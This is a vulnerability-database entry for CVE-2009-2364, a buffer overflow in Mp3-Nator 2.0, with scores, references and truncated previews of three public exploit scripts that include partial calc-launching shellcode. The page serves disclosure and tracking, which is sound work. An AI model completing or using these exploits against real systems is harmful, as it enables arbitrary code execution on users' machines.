CVE-2009-2364
published 2009-07-08CVE-2009-2364: Stack-based buffer overflow in Mp3-Nator 2.0 allows remote attackers to execute arbitrary code via (1) a long string in a .plf file and (2) a long string in…
PriorityP342critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.09%
95.1th percentile
Stack-based buffer overflow in Mp3-Nator 2.0 allows remote attackers to execute arbitrary code via (1) a long string in a .plf file and (2) a long string in the listdata.dat file, possibly related to a track entry.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mp3-nator | mp3-nator | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)
exploitdb·2010-11-18
CVE-2009-2364 MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)
MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)
---
# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)
# Date: 18-11-2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: C4SS!0 G0M3S
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
# Version: 2.0
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
#! /usr/bin/env ruby
filename = 'crash.plf'
# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
shellcode =
"\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\
Exploit-DB
MP3-Nator 2.0 - Local Buffer Overflow (SEH)
exploitdb·2010-11-11
CVE-2009-2364 MP3-Nator 2.0 - Local Buffer Overflow (SEH)
MP3-Nator 2.0 - Local Buffer Overflow (SEH)
---
#!usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10\11\2010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Writted By C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: [email protected]
#
#
import os,sys
def layout():
os.system("cls")
os.system("color 4f")
print("\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0")
print("[+]Author : C4SS!0 G0M3S")
print("[+]E-mail : [email protected]")
print("[+]Home : http://www.invasao.com.br")
print("[+]Impact : Hich")
print("[+]Version : 2.0\n")
if len(sys.argv)!=2:
layout()
print("[-]Usage: Exploit.
Exploit-DB
MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)
exploitdb·2009-07-01
CVE-2009-2364 MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)
MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
#[+] Bug : Mp3-Nator 2.0 (plf) Universal Buffer Overflow Exploit (SEH)
#[+] Author : ThE g0bL!N
# # Greetz to all my friends
## Download:http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
## Tested on: Windows XP Pro SP2 (Fr)
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/9060http://www.exploit-db.com/exploits/9136http://www.vupen.com/english/advisories/2009/1765https://exchange.xforce.ibmcloud.com/vulnerabilities/51486http://www.exploit-db.com/exploits/9060http://www.exploit-db.com/exploits/9136http://www.vupen.com/english/advisories/2009/1765https://exchange.xforce.ibmcloud.com/vulnerabilities/51486
2009-07-08
Published